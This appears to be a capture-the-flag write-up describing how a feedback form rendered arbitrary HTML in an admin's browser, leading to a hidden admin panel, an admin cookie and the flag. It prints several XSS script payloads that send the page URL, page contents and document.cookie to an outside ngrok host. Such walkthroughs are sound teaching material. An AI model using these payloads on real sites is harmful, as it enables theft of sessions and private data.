XSS leads to information leakage of hidden endpoint and authentication bypass.
We've made some new epic updates to our website. Could you send us some feedback on it?
We are given an endpoint that allows us to "Send a feedback to admin". I tried submitting URLs but these had no effect.
Later, I found that we could submit arbitrary HTML that would be rendered by the admin's browser. This could be verified by submitting the following and catching the HTTP request:
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/"; </script>
It is then trivial to obtain more information from the victim's browser.
We still don't know how exactly our submitted HTML is handled. Where is it rendered and in what context? To answer that question, I tried the following payload to get the page URL, contents and cookie.
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/?url=" + escape(window.location.href); </script>
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/?doc=" + escape(document.body.innerHTML); </script>
<script> var i = new Image(); i.src = "http://8a8a8026deac.ngrok.io/?cookie=" + escape(document.cookie); </script>
window.location.hrefgives us the full URL of the browsing context,
document.body.innerHTMLgives us the page contents, and
From the output, it appeared that:
- The page URL is
- Our submitted HTML was the only content present on the page.
My teammate rainbowpigeon then visited the
/Secret_admin_cookie_panelendpoint and found that this page returned a
Set-Cookieheader for a new cookie with the HttpOnly flag set. This was the "admin cookie" we needed.
My teammate lim_yj found that there is a
/flagendpoint, previously inaccessible without the appropriate cookie.
Visiting the page again with the admin cookie set gives us the flag.